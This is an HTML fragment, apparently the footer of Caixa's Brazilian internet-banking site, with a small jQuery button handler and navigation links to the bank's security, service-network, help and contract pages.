                        <script>$('#btnContratarPromo').click(function () { if ($("#btnContratarPromo").text() == "Eu quero!") { window.open("http://www.caixa.gov.br/agenciadigital") } })</script>
                    </div>
                </div>
                <div class="col-lg-8 col-md-8 col-sm-8 pull-right">
                    <ul class="rodapeNav nav navbar-nav pull-right">
                        <li class="rodapeBtDirEsq">
                            <a id="rodapeSeguranca" class="rodapeLink rodapeBtSeguranca" target="_blank"
                                href="http://www.caixa.gov.br/seguranca/Paginas/default.aspx" tabindex="1">Segurança</a>
                        </li>
                        <li class="rodapeBtDirLinha">
                            <a id="rodapeAtendimentoLink" class="rodapeLink rodapeBtAtendimento"
                                onclick="abrirLink('rodapeAtendimento')" tabindex="2">Rede de Atendimento</a>
                            <a id="rodapeAtendimento" style="display:none"
                                href="http://www.caixa.gov.br/atendimento/Paginas/default.aspx" tabindex="3">.</a>
                        </li>
                        <li class="rodapeBtDirLinha">
                            <a id="rodapeAjudaLink" class="rodapeLink rodapeBtAjuda" onclick="abrirLink('rodapeAjuda')"
                                tabindex="4">Ajuda</a>
                            <a id="rodapeAjuda" style="display:none"
                                href="http://www.caixa.gov.br/atendimento/internet-banking/Paginas/default.aspx"
                                tabindex="5">.</a>
                        </li>
                        <li class="rodapeBtDir">
                            <a id="rodapeTermosLink" class="rodapeLink rodapeBtTermos"
                                onclick="abrirLink('rodapeTermos')" tabindex="6">Termos e Contratos</a>
                            <a id="rodapeTermos" style="display:none"
                                href="https://internetbanking.caixa.gov.br/statics-core/pdf/contrato.pdf"
                                tabindex="7">.</a>
                        </li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
</div>